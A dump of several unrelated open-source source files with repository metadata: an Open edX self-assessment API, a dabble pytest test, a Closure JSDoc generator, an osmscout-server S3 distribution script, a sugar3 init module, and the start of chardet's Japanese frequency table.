Get the score for this particular assessment.
Args:
submission_uuid (str): The unique identifier for the submission
requirements (dict): Not used.
Returns:
A dict of points earned and points possible for the given submission.
Returns None if no score can be determined yet.
Examples:
>>> get_score('222bdf3d-a88e-11e3-859e-040ccee02800', {})
{
'points_earned': 5,
'points_possible': 10
}
"""
assessment = get_assessment(submission_uuid)
if not assessment:
return None
return {
"points_earned": assessment["points_earned"],
"points_possible": assessment["points_possible"]
}
def create_assessment(
submission_uuid,
user_id,
options_selected,
criterion_feedback,
overall_feedback,
rubric_dict,
scored_at=None
):
"""
Create a self-assessment for a submission.
Args:
submission_uuid (str): The unique identifier for the submission being assessed.
user_id (str): The ID of the user creating the assessment. This must match the ID of the user who made the submission.
options_selected (dict): Mapping of rubric criterion names to option values selected.
criterion_feedback (dict): Dictionary mapping criterion names to the
free-form text feedback the user gave for the criterion.
Since criterion feedback is optional, some criteria may not appear
in the dictionary.
overall_feedback (unicode): Free-form text feedback on the submission overall.
rubric_dict (dict): Serialized Rubric model.
Keyword Arguments:
scored_at (datetime): The timestamp of the assessment; defaults to the current time.
Returns:
dict: serialized Assessment model
Raises:
SelfAssessmentRequestError: Could not retrieve a submission that the user is allowed to score.
"""
# Check that there are not any assessments for this submission
if Assessment.objects.filter(submission_uuid=submission_uuid, score_type=SELF_TYPE).exists():
msg = (
u"Cannot submit a self-assessment for the submission {uuid} "
"because another self-assessment already exists for that submission."
).format(uuid=submission_uuid)
raise SelfAssessmentRequestError(msg)
# Check that the student is allowed to assess this submission
try:
submission = get_submission_and_student(submission_uuid)
if submission['student_item']['student_id'] != user_id:
msg = (
u"Cannot submit a self-assessment for the submission {uuid} "
u"because it was created by another student "
u"(submission student ID {student_id} does not match your "
u"student id {other_id})"
).format(
uuid=submission_uuid,
student_id=submission['student_item']['student_id'],
other_id=user_id
)
raise SelfAssessmentRequestError(msg)
except SubmissionNotFoundError:
msg = (
"Could not submit a self-assessment because no submission "
"exists with UUID {uuid}"
).format(uuid=submission_uuid)
raise SelfAssessmentRequestError()
try:
assessment = _complete_assessment(
submission_uuid,
user_id,
options_selected,
criterion_feedback,
overall_feedback,
rubric_dict,
scored_at
)
_log_assessment(assessment, submission)
except InvalidRubric as ex:
msg = "Invalid rubric definition: " + str(ex)
logger.warning(msg, exc_info=True)
raise SelfAssessmentRequestError(msg)
except InvalidRubricSelection as ex:
msg = "Selected options do not match the rubric: " + str(ex)
logger.warning(msg, exc_info=True)
raise SelfAssessmentRequestError(msg)
except DatabaseError:
error_message = (
u"Error creating self assessment for submission {}"
).format(submission_uuid)
logger.exception(error_message)
raise SelfAssessmentInternalError(error_message)
# Return the serialized assessment
return full_assessment_dict(assessment)
@transaction.commit_on_success
def _complete_assessment(
submission_uuid,
user_id,
options_selected,
criterion_feedback,
overall_feedback,
rubric_dict,
scored_at
):
"""
Internal function for creating an assessment and its parts atomically.
Args:
submission_uuid (str): The unique identifier for the submission being
assessed.
user_id (str): The ID of the user creating the assessment. This must
match the ID of the user who made the submission.
options_selected (dict): Mapping of rubric criterion names to option
values selected.
criterion_feedback (dict): Dictionary mapping criterion names to the
free-form text feedback the user gave for the criterion.
Since criterion feedback is optional, some criteria may not appear
in the dictionary.
overall_feedback (unicode): Free-form text feedback on the submission overall.
rubric_dict (dict): Serialized Rubric model.
scored_at (datetime): The timestamp of the assessment.
Returns:
Assessment model
"""
# Get or create the rubric
rubric = rubric_from_dict(rubric_dict)
# Create the self assessment
assessment = Assessment.create(
rubric,
user_id,
submission_uuid,
SELF_TYPE,
scored_at=scored_at,
feedback=overall_feedback
)
# This will raise an `InvalidRubricSelection` if the selected options do not match the rubric.
AssessmentPart.create_from_option_names(assessment, options_selected, feedback=criterion_feedback)
return assessment
def get_assessment(submission_uuid):
"""
Retrieve a self-assessment for a submission_uuid.
Args:
submission_uuid (str): The submission UUID for we want information for
regarding self assessment.
Returns:
assessment (dict) is a serialized Assessment model, or None (if the user has not yet self-assessed)
If multiple submissions or self-assessments are found, returns the most recent one.
Raises:
SelfAssessmentRequestError: submission_uuid was invalid.
"""
# Retrieve assessments for the submission UUID
# We weakly enforce that number of self-assessments per submission is <= 1,
# but not at the database level. Someone could take advantage of the race condition
# between checking the number of self-assessments and creating a new self-assessment.
# To be safe, we retrieve just the most recent submission.
serialized_assessments = serialize_assessments(Assessment.objects.filter(
score_type=SELF_TYPE, submission_uuid=submission_uuid
).order_by('-scored_at')[:1])
if not serialized_assessments:
logger.info(
u"No self-assessment found for submission {}".format(submission_uuid)
)
return None
serialized_assessment = serialized_assessments[0]
logger.info(u"Retrieved self-assessment for submission {}".format(submission_uuid))
return serialized_assessment
def get_assessment_scores_by_criteria(submission_uuid):
"""Get the median score for each rubric criterion
Args:
submission_uuid (str): The submission uuid is used to get the
assessments used to score this submission, and generate the
appropriate median score.
Returns:
(dict): A dictionary of rubric criterion names, with a median score of
the peer assessments.
Raises:
SelfAssessmentInternalError: If any error occurs while retrieving
information to form the median scores, an error is raised.
"""
try:
assessments = list(
Assessment.objects.filter(
score_type=SELF_TYPE, submission_uuid=submission_uuid
).order_by('-scored_at')[:1]
)
scores = Assessment.scores_by_criterion(assessments)
return Assessment.get_median_score_dict(scores)
except DatabaseError:
error_message = (
u"Error getting self assessment scores for submission {}"
).format(submission_uuid)
logger.exception(error_message)
raise SelfAssessmentInternalError(error_message)
def _log_assessment(assessment, submission):
"""
Log the creation of a self-assessment.
Args:
assessment (Assessment): The assessment model.
submission (dict): The serialized submission model.
Returns:
None
"""
logger.info(
u"Created self-assessment {assessment_id} for student {user} on "
u"submission {submission_uuid}, course {course_id}, item {item_id} "
u"with rubric {rubric_content_hash}"
.format(
assessment_id=assessment.id,
user=submission['student_item']['student_id'],
submission_uuid=submission['uuid'],
course_id=submission['student_item']['course_id'],
item_id=submission['student_item']['item_id'],
rubric_content_hash=assessment.rubric.content_hash
)
)
tags = [
u"course_id:{course_id}".format(course_id=submission['student_item']['course_id']),
u"item_id:{item_id}".format(item_id=submission['student_item']['item_id']),
u"type:self"
]
score_percentage = assessment.to_float()
if score_percentage is not None:
dog_stats_api.histogram('openassessment.assessment.score_percentage', score_percentage, tags=tags)
dog_stats_api.increment('openassessment.assessment.count', tags=tags)
| agpl-3.0 |
Eigenstate/dabble | dabble/test/dor_abssel/test_dor_absolute_sel.py | 1 | 1915 | """
Tests absolute box size with ignored selection
"""
import os
import pytest
dir = os.path.dirname(__file__) + "/"
#==============================================================================
@pytest.mark.skip(reason="Missing input file")
def test_absolute_box(tmpdir):
"""
Tests the absolute box size for a system with ligands far from
the box
"""
from vmd import atomsel, molecule
from dabble import DabbleBuilder
# Build the system
p = str(tmpdir)
b = DabbleBuilder(solute_filename=os.path.join(dir, "dor_ligs.mae"),
output_filename=os.path.join(p, "test.mae"),
user_x=75., user_y=75., user_z=115.,
overwrite=True, tmp_dir=p,
exclude_sel="same fragment as resname FRAG")
b.write()
# Load the built system
m2 = molecule.load("mae", os.path.join(p, "test.mae"))
molecule.set_top(m2)
# Check all the ligands are there
assert len(set(atomsel("resname FRAG").residue)) == 3
#==============================================================================
#def test_absolute_box_noexclude(tmpdir):
# """
# Tests the absolute box size for a system with ligands far from
# the box, without using an exclude selection
# """
# from vmd import atomsel, molecule
#
# from dabble import DabbleBuilder
# p = str(tmpdir)
#
# # Building the system should raise a valueerror in sanity check
# # as resids are duplicated in protein chain
# with pytest.raises(ValueError):
# b = DabbleBuilder(solute_filename=os.path.join(dir, "dor_ligs.mae"),
# output_filename=os.path.join(p, "test.mae"),
# user_x=75., user_y=75., user_z=115.,
# overwrite=True, tmp_dir=p)
# b.write()
#
#==============================================================================
| gpl-2.0 |
polux/webPLM | public/javascripts/closure-library-read-only/closure/bin/labs/code/generate_jsdoc.py | 222 | 4318 | #!/usr/bin/env python
#
# Copyright 2013 The Closure Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool to insert JsDoc before a function.
This script attempts to find the first function passed in to stdin, generate
JSDoc for it (with argument names and possibly return value), and inject
it in the string. This is intended to be used as a subprocess by editors
such as emacs and vi.
"""
import re
import sys
# Matches a typical Closure-style function definition.
_FUNCTION_REGEX = re.compile(r"""
# Start of line
^
# Indentation
(?P<indentation>[ ]*)
# Identifier (handling split across line)
(?P<identifier>\w+(\s*\.\s*\w+)*)
# "= function"
\s* = \s* function \s*
# opening paren
\(
# Function arguments
(?P<arguments>(?:\s|\w+|,)*)
# closing paren
\)
# opening bracket
\s* {
""", re.MULTILINE | re.VERBOSE)
def _MatchFirstFunction(script):
"""Match the first function seen in the script."""
return _FUNCTION_REGEX.search(script)
def _ParseArgString(arg_string):
"""Parse an argument string (inside parens) into parameter names."""
for arg in arg_string.split(','):
arg = arg.strip()
if arg:
yield arg
def _ExtractFunctionBody(script, indentation=0):
"""Attempt to return the function body."""
# Real extraction would require a token parser and state machines.
# We look for first bracket at the same level of indentation.
regex_str = r'{(.*?)^[ ]{%d}}' % indentation
function_regex = re.compile(regex_str, re.MULTILINE | re.DOTALL)
match = function_regex.search(script)
if match:
return match.group(1)
def _ContainsReturnValue(function_body):
"""Attempt to determine if the function body returns a value."""
return_regex = re.compile(r'\breturn\b[^;]')
# If this matches, we assume they're returning something.
return bool(return_regex.search(function_body))
def _InsertString(original_string, inserted_string, index):
"""Insert a string into another string at a given index."""
return original_string[0:index] + inserted_string + original_string[index:]
def _GenerateJsDoc(args, return_val=False):
"""Generate JSDoc for a function.
Args:
args: A list of names of the argument.
return_val: Whether the function has a return value.
Returns:
The JSDoc as a string.
"""
lines = []
lines.append('/**')
lines += [' * @param {} %s' % arg for arg in args]
if return_val:
lines.append(' * @return')
lines.append(' */')
return '\n'.join(lines) + '\n'
def _IndentString(source_string, indentation):
"""Indent string some number of characters."""
lines = [(indentation * ' ') + line
for line in source_string.splitlines(True)]
return ''.join(lines)
def InsertJsDoc(script):
"""Attempt to insert JSDoc for the first seen function in the script.
Args:
script: The script, as a string.
Returns:
Returns the new string if function was found and JSDoc inserted. Otherwise
returns None.
"""
match = _MatchFirstFunction(script)
if not match:
return
# Add argument flags.
args_string = match.group('arguments')
args = _ParseArgString(args_string)
start_index = match.start(0)
function_to_end = script[start_index:]
lvalue_indentation = len(match.group('indentation'))
return_val = False
function_body = _ExtractFunctionBody(function_to_end, lvalue_indentation)
if function_body:
return_val = _ContainsReturnValue(function_body)
jsdoc = _GenerateJsDoc(args, return_val)
if lvalue_indentation:
jsdoc = _IndentString(jsdoc, lvalue_indentation)
return _InsertString(script, jsdoc, start_index)
if __name__ == '__main__':
stdin_script = sys.stdin.read()
result = InsertJsDoc(stdin_script)
if result:
sys.stdout.write(result)
else:
sys.stdout.write(stdin_script)
| agpl-3.0 |
rinigus/osmscout-server | scripts/import/prepare_distribution.py | 1 | 5119 | #!/usr/bin/env python
# This script prepares files before uploading them for distribution
# This has to be run after all imports are finished
import json, pickle, os, stat, shutil
from mapbox_country_pack import world_pack as mapboxgl_world_pack
root_dir = "distribution"
bucket = open("bucket_name", "r").read().strip()
url_base = "http://data.modrana.org/osm_scout_server"
#url_base = "https://kuqrhldx.e24files.com"
url_specs = {
"base": url_base,
"type": "url",
#"osmscout": "osmscout-27",
"geocoder_nlp": "geocoder-nlp-29",
"postal_global": "postal-global-2",
"postal_country": "postal-country-2",
"mapnik_global": "mapnik-global-1",
"mapnik_country": "mapnik-country-24",
"mapboxgl_country": "mapboxgl-16",
"mapboxgl_global": "mapboxgl-16",
"mapboxgl_glyphs": "mapboxgl-16",
"valhalla": "valhalla-24",
}
dist = json.loads( open("countries.json", "r").read() )
dist["postal/global"] = {
"id": "postal/global",
"type": "postal/global",
"postal_global": { "path": "postal/global-v1" }
}
dist["mapnik/global"] = {
"id": "mapnik/global",
"type": "mapnik/global",
"mapnik_global": { "path": "mapnik/global" }
}
dist["mapboxgl/glyphs"] = {
"id": "mapboxgl/glyphs",
"type": "mapboxgl/glyphs",
"mapboxgl_glyphs": { "path": "mapboxgl/glyphs" }
}
dist["url"] = url_specs
# could make it smarter in future to check whether the files have
# changed since the last upload
toupload = []
upload_commands = "#!/bin/bash\nset -e\nrm -f digest.md5\n"
def uploader(dirname, targetname, extra="/"):
global toupload, upload_commands
toupload.append([dirname, targetname])
upload_commands += "echo\necho " + dirname + "\n"
sd = dirname.replace("/", "\/")
st = targetname.replace("/", "\/")
upload_commands += "md5deep -t -l -r " + dirname + " | sed 's/%s/%s/g' >> digest.md5\n" % (sd,st)
upload_commands += "s3cmd --config=.s3cfg sync " + dirname + extra + " s3://" + bucket + "/" + targetname + extra + " --acl-public --signature-v2 " + "\n"
def getprop(dirname):
props = {}
for p in ["size", "size-compressed", "timestamp", "version"]:
v = open(dirname + "." + p, "r").read().split()[0]
props[p] = v
return props
# fill database details
for d in dist:
for sub in dist[d]:
if "packages" in dist[d][sub]:
continue # this item is distributed via packages
try:
rpath = dist[d][sub]["path"]
print(rpath)
except:
continue
locdir = root_dir + "/" + rpath
remotedir = url_specs[sub] + "/" + rpath
dist[d][sub].update( getprop(locdir) )
uploader(locdir, remotedir)
uploader(root_dir + "/valhalla", url_specs["valhalla"] + "/valhalla")
uploader(root_dir + "/mapboxgl/packages", url_specs["mapboxgl_country"] + "/mapboxgl/packages")
# add mapbox global object after uploader commands are ready
dist["mapboxgl/global"] = {
"id": "mapboxgl/global",
"type": "mapboxgl/global",
"mapboxgl_global": mapboxgl_world_pack()
}
# save provided countries
fjson = open("provided/countries_provided.json", "w")
fjson.write( json.dumps( dist, sort_keys=True, indent=4, separators=(',', ': ')) )
fjson.close()
uploader("provided/countries_provided.json", "countries_provided.json", extra = "")
upload_commands += "bzip2 -f digest.md5\n"
uploader("digest.md5.bz2", "digest.md5.bz2", extra = "")
upload_commands += "echo\necho 'Set S3 permissions'\n"
upload_commands += "s3cmd --config=.s3cfg setacl s3://" + bucket + "/ --acl-public --recursive\n"
upload_commands += "mv digest.md5 digest.md5.bz2.md5\n"
uploader("digest.md5.bz2.md5", "digest.md5.bz2.md5", extra = "")
# save uploader script
fscript = open("uploader.sh", "w")
fscript.write( upload_commands )
fscript.write( "echo\necho 'Set S3 permissions'\n" )
fscript.write( "s3cmd --config=.s3cfg setacl s3://" + bucket + "/ --acl-public --recursive\n" )
fscript.write( "s3cmd --config=.s3cfg setacl s3://" + bucket + "/ --acl-private\n" )
fscript.close()
st = os.stat('uploader.sh')
os.chmod('uploader.sh', st.st_mode | stat.S_IEXEC)
print("Check uploader script and run it")
# generate public_html folder for testing
testing_mirror = "public_http"
shutil.rmtree(testing_mirror, ignore_errors=True)
os.mkdir(testing_mirror)
os.symlink("../provided/countries_provided.json",
os.path.join(testing_mirror, "countries_provided.json"))
distlink = { "geocoder_nlp": "geocoder-nlp",
"mapboxgl_country": "mapboxgl",
"mapnik_country": "mapnik",
"mapnik_global": "mapnik",
#"osmscout": "osmscout",
"postal_country": "postal",
"postal_global": "postal",
"valhalla": "valhalla" }
for t in ["geocoder_nlp", "mapboxgl_country",
"mapnik_country", "mapnik_global",
#"osmscout",
"postal_country", "postal_global", "valhalla" ]:
d = os.path.join(testing_mirror, url_specs[t])
os.mkdir(d)
os.symlink( "../../distribution/" + distlink[t], os.path.join(d, distlink[t]) )
| gpl-3.0 |
ceibal-tatu/sugar-toolkit-gtk3 | src/sugar3/__init__.py | 5 | 1048 | # Copyright (C) 2006-2007, Red Hat, Inc.
# Copyright (C) 2007-2008, One Laptop Per Child
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
import os
import gettext
if 'SUGAR_PREFIX' in os.environ:
prefix = os.environ['SUGAR_PREFIX']
else:
prefix = '/usr'
locale_path = os.path.join(prefix, 'share', 'locale')
gettext.bindtextdomain('sugar-base', locale_path)
| lgpl-2.1 |
Microsoft/PTVS | Python/Product/Miniconda/Miniconda3-x64/Lib/site-packages/pip/_vendor/chardet/jpcntx.py | 289 | 19643 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# This is hiragana 2-char sequence table, the number in each cell represents its frequency category
jp2CharContext = (
(0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1),
(2,4,0,4,0,3,0,4,0,3,4,4,4,2,4,3,3,4,3,2,3,3,4,2,3,3,3,2,4,1,4,3,3,1,5,4,3,4,3,4,3,5,3,0,3,5,4,2,0,3,1,0,3,3,0,3,3,0,1,1,0,4,3,0,3,3,0,4,0,2,0,3,5,5,5,5,4,0,4,1,0,3,4),
(0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2),
(0,4,0,5,0,5,0,4,0,4,5,4,4,3,5,3,5,1,5,3,4,3,4,4,3,4,3,3,4,3,5,4,4,3,5,5,3,5,5,5,3,5,5,3,4,5,5,3,1,3,2,0,3,4,0,4,2,0,4,2,1,5,3,2,3,5,0,4,0,2,0,5,4,4,5,4,5,0,4,0,0,4,4),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,3,0,4,0,3,0,3,0,4,5,4,3,3,3,3,4,3,5,4,4,3,5,4,4,3,4,3,4,4,4,4,5,3,4,4,3,4,5,5,4,5,5,1,4,5,4,3,0,3,3,1,3,3,0,4,4,0,3,3,1,5,3,3,3,5,0,4,0,3,0,4,4,3,4,3,3,0,4,1,1,3,4),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,4,0,3,0,3,0,4,0,3,4,4,3,2,2,1,2,1,3,1,3,3,3,3,3,4,3,1,3,3,5,3,3,0,4,3,0,5,4,3,3,5,4,4,3,4,4,5,0,1,2,0,1,2,0,2,2,0,1,0,0,5,2,2,1,4,0,3,0,1,0,4,4,3,5,4,3,0,2,1,0,4,3),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,3,0,5,0,4,0,2,1,4,4,2,4,1,4,2,4,2,4,3,3,3,4,3,3,3,3,1,4,2,3,3,3,1,4,4,1,1,1,4,3,3,2,0,2,4,3,2,0,3,3,0,3,1,1,0,0,0,3,3,0,4,2,2,3,4,0,4,0,3,0,4,4,5,3,4,4,0,3,0,0,1,4),
(1,4,0,4,0,4,0,4,0,3,5,4,4,3,4,3,5,4,3,3,4,3,5,4,4,4,4,3,4,2,4,3,3,1,5,4,3,2,4,5,4,5,5,4,4,5,4,4,0,3,2,2,3,3,0,4,3,1,3,2,1,4,3,3,4,5,0,3,0,2,0,4,5,5,4,5,4,0,4,0,0,5,4),
(0,5,0,5,0,4,0,3,0,4,4,3,4,3,3,3,4,0,4,4,4,3,4,3,4,3,3,1,4,2,4,3,4,0,5,4,1,4,5,4,4,5,3,2,4,3,4,3,2,4,1,3,3,3,2,3,2,0,4,3,3,4,3,3,3,4,0,4,0,3,0,4,5,4,4,4,3,0,4,1,0,1,3),
(0,3,1,4,0,3,0,2,0,3,4,4,3,1,4,2,3,3,4,3,4,3,4,3,4,4,3,2,3,1,5,4,4,1,4,4,3,5,4,4,3,5,5,4,3,4,4,3,1,2,3,1,2,2,0,3,2,0,3,1,0,5,3,3,3,4,3,3,3,3,4,4,4,4,5,4,2,0,3,3,2,4,3),
(0,2,0,3,0,1,0,1,0,0,3,2,0,0,2,0,1,0,2,1,3,3,3,1,2,3,1,0,1,0,4,2,1,1,3,3,0,4,3,3,1,4,3,3,0,3,3,2,0,0,0,0,1,0,0,2,0,0,0,0,0,4,1,0,2,3,2,2,2,1,3,3,3,4,4,3,2,0,3,1,0,3,3),
(0,4,0,4,0,3,0,3,0,4,4,4,3,3,3,3,3,3,4,3,4,2,4,3,4,3,3,2,4,3,4,5,4,1,4,5,3,5,4,5,3,5,4,0,3,5,5,3,1,3,3,2,2,3,0,3,4,1,3,3,2,4,3,3,3,4,0,4,0,3,0,4,5,4,4,5,3,0,4,1,0,3,4),
(0,2,0,3,0,3,0,0,0,2,2,2,1,0,1,0,0,0,3,0,3,0,3,0,1,3,1,0,3,1,3,3,3,1,3,3,3,0,1,3,1,3,4,0,0,3,1,1,0,3,2,0,0,0,0,1,3,0,1,0,0,3,3,2,0,3,0,0,0,0,0,3,4,3,4,3,3,0,3,0,0,2,3),
(2,3,0,3,0,2,0,1,0,3,3,4,3,1,3,1,1,1,3,1,4,3,4,3,3,3,0,0,3,1,5,4,3,1,4,3,2,5,5,4,4,4,4,3,3,4,4,4,0,2,1,1,3,2,0,1,2,0,0,1,0,4,1,3,3,3,0,3,0,1,0,4,4,4,5,5,3,0,2,0,0,4,4),
(0,2,0,1,0,3,1,3,0,2,3,3,3,0,3,1,0,0,3,0,3,2,3,1,3,2,1,1,0,0,4,2,1,0,2,3,1,4,3,2,0,4,4,3,1,3,1,3,0,1,0,0,1,0,0,0,1,0,0,0,0,4,1,1,1,2,0,3,0,0,0,3,4,2,4,3,2,0,1,0,0,3,3),
(0,1,0,4,0,5,0,4,0,2,4,4,2,3,3,2,3,3,5,3,3,3,4,3,4,2,3,0,4,3,3,3,4,1,4,3,2,1,5,5,3,4,5,1,3,5,4,2,0,3,3,0,1,3,0,4,2,0,1,3,1,4,3,3,3,3,0,3,0,1,0,3,4,4,4,5,5,0,3,0,1,4,5),
(0,2,0,3,0,3,0,0,0,2,3,1,3,0,4,0,1,1,3,0,3,4,3,2,3,1,0,3,3,2,3,1,3,0,2,3,0,2,1,4,1,2,2,0,0,3,3,0,0,2,0,0,0,1,0,0,0,0,2,2,0,3,2,1,3,3,0,2,0,2,0,0,3,3,1,2,4,0,3,0,2,2,3),
(2,4,0,5,0,4,0,4,0,2,4,4,4,3,4,3,3,3,1,2,4,3,4,3,4,4,5,0,3,3,3,3,2,0,4,3,1,4,3,4,1,4,4,3,3,4,4,3,1,2,3,0,4,2,0,4,1,0,3,3,0,4,3,3,3,4,0,4,0,2,0,3,5,3,4,5,2,0,3,0,0,4,5),
(0,3,0,4,0,1,0,1,0,1,3,2,2,1,3,0,3,0,2,0,2,0,3,0,2,0,0,0,1,0,1,1,0,0,3,1,0,0,0,4,0,3,1,0,2,1,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,4,2,2,3,1,0,3,0,0,0,1,4,4,4,3,0,0,4,0,0,1,4),
(1,4,1,5,0,3,0,3,0,4,5,4,4,3,5,3,3,4,4,3,4,1,3,3,3,3,2,1,4,1,5,4,3,1,4,4,3,5,4,4,3,5,4,3,3,4,4,4,0,3,3,1,2,3,0,3,1,0,3,3,0,5,4,4,4,4,4,4,3,3,5,4,4,3,3,5,4,0,3,2,0,4,4),
(0,2,0,3,0,1,0,0,0,1,3,3,3,2,4,1,3,0,3,1,3,0,2,2,1,1,0,0,2,0,4,3,1,0,4,3,0,4,4,4,1,4,3,1,1,3,3,1,0,2,0,0,1,3,0,0,0,0,2,0,0,4,3,2,4,3,5,4,3,3,3,4,3,3,4,3,3,0,2,1,0,3,3),
(0,2,0,4,0,3,0,2,0,2,5,5,3,4,4,4,4,1,4,3,3,0,4,3,4,3,1,3,3,2,4,3,0,3,4,3,0,3,4,4,2,4,4,0,4,5,3,3,2,2,1,1,1,2,0,1,5,0,3,3,2,4,3,3,3,4,0,3,0,2,0,4,4,3,5,5,0,0,3,0,2,3,3),
(0,3,0,4,0,3,0,1,0,3,4,3,3,1,3,3,3,0,3,1,3,0,4,3,3,1,1,0,3,0,3,3,0,0,4,4,0,1,5,4,3,3,5,0,3,3,4,3,0,2,0,1,1,1,0,1,3,0,1,2,1,3,3,2,3,3,0,3,0,1,0,1,3,3,4,4,1,0,1,2,2,1,3),
(0,1,0,4,0,4,0,3,0,1,3,3,3,2,3,1,1,0,3,0,3,3,4,3,2,4,2,0,1,0,4,3,2,0,4,3,0,5,3,3,2,4,4,4,3,3,3,4,0,1,3,0,0,1,0,0,1,0,0,0,0,4,2,3,3,3,0,3,0,0,0,4,4,4,5,3,2,0,3,3,0,3,5),
(0,2,0,3,0,0,0,3,0,1,3,0,2,0,0,0,1,0,3,1,1,3,3,0,0,3,0,0,3,0,2,3,1,0,3,1,0,3,3,2,0,4,2,2,0,2,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,2,1,2,0,1,0,1,0,0,0,1,3,1,2,0,0,0,1,0,0,1,4),
(0,3,0,3,0,5,0,1,0,2,4,3,1,3,3,2,1,1,5,2,1,0,5,1,2,0,0,0,3,3,2,2,3,2,4,3,0,0,3,3,1,3,3,0,2,5,3,4,0,3,3,0,1,2,0,2,2,0,3,2,0,2,2,3,3,3,0,2,0,1,0,3,4,4,2,5,4,0,3,0,0,3,5),
(0,3,0,3,0,3,0,1,0,3,3,3,3,0,3,0,2,0,2,1,1,0,2,0,1,0,0,0,2,1,0,0,1,0,3,2,0,0,3,3,1,2,3,1,0,3,3,0,0,1,0,0,0,0,0,2,0,0,0,0,0,2,3,1,2,3,0,3,0,1,0,3,2,1,0,4,3,0,1,1,0,3,3),
(0,4,0,5,0,3,0,3,0,4,5,5,4,3,5,3,4,3,5,3,3,2,5,3,4,4,4,3,4,3,4,5,5,3,4,4,3,4,4,5,4,4,4,3,4,5,5,4,2,3,4,2,3,4,0,3,3,1,4,3,2,4,3,3,5,5,0,3,0,3,0,5,5,5,5,4,4,0,4,0,1,4,4),
(0,4,0,4,0,3,0,3,0,3,5,4,4,2,3,2,5,1,3,2,5,1,4,2,3,2,3,3,4,3,3,3,3,2,5,4,1,3,3,5,3,4,4,0,4,4,3,1,1,3,1,0,2,3,0,2,3,0,3,0,0,4,3,1,3,4,0,3,0,2,0,4,4,4,3,4,5,0,4,0,0,3,4),
(0,3,0,3,0,3,1,2,0,3,4,4,3,3,3,0,2,2,4,3,3,1,3,3,3,1,1,0,3,1,4,3,2,3,4,4,2,4,4,4,3,4,4,3,2,4,4,3,1,3,3,1,3,3,0,4,1,0,2,2,1,4,3,2,3,3,5,4,3,3,5,4,4,3,3,0,4,0,3,2,2,4,4),
(0,2,0,1,0,0,0,0,0,1,2,1,3,0,0,0,0,0,2,0,1,2,1,0,0,1,0,0,0,0,3,0,0,1,0,1,1,3,1,0,0,0,1,1,0,1,1,0,0,0,0,0,2,0,0,0,0,0,0,0,0,1,1,2,2,0,3,4,0,0,0,1,1,0,0,1,0,0,0,0,0,1,1),
(0,1,0,0,0,1,0,0,0,0,4,0,4,1,4,0,3,0,4,0,3,0,4,0,3,0,3,0,4,1,5,1,4,0,0,3,0,5,0,5,2,0,1,0,0,0,2,1,4,0,1,3,0,0,3,0,0,3,1,1,4,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0),
(1,4,0,5,0,3,0,2,0,3,5,4,4,3,4,3,5,3,4,3,3,0,4,3,3,3,3,3,3,2,4,4,3,1,3,4,4,5,4,4,3,4,4,1,3,5,4,3,3,3,1,2,2,3,3,1,3,1,3,3,3,5,3,3,4,5,0,3,0,3,0,3,4,3,4,4,3,0,3,0,2,4,3),
